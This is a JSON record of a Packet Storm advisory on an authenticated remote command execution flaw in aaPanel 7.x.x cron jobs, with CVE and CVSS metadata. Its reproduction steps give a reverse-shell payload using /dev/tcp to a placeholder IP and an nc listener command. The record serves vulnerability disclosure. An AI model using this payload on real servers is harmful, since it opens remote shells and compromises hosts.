📄 aaPanel 7.x.x Remote Command Execution_PACKETSTORM:209686

{
    "lastseen": "2025-09-19T16:53:39",
    "description": "aaPanel version 7.x.x suffers from an authenticated remote command execution vulnerability. This was...",
    "published": "2025-09-19T00:00:00",
    "modified": "2025-09-19T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 aaPanel 7.x.x Remote Command Execution",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:209686",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2020-14421"
    ],
    "sourceData": "This is authenticated RCE.\n    \n    Vulnerability Description\n    \n    During my testing/evaluation of aaPanel, I identified a flaw in how cron\n    jobs are handled, which enables an attacker to inject and execute arbitrary\n    commands remotely. Specifically:\n    \n       -\n    \n       An authenticated user can manipulate cron job entries in a way that\n       breaks out of the software to the server.\n       -\n    \n       This leads to the execution of malicious code on the server hosting\n       aaPanel, potentially compromising the entire system.\n    \n    Steps to Reproduce\n    \n       1.\n    \n       Log in to the aaPanel dashboard\n    \n       2.\n    \n       Create a new cron job with the payload:    bash -c \"bash -i >& /dev/tcp/XXXX/1234 0>&1\"   (XXXX is your ip)\n    \n       3.\n    \n       Save the cron job and trigger it (or wait for the scheduled execution).\n       Start a listener on the other side to receive: nc -lvnp 1234\n    \n       4.\n    \n       Observe the execution of the injected command on the server and RCE.\n    \n       Many thanks,\n    \n       Alasdair Gorniak/Hamed Kohi",
    "sourceHref": "https://packetstorm.news/download/209686",
    "cvss": {
        "score": 9,
        "severity": "HIGH",
        "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
        "version": "2.0"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/209686/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}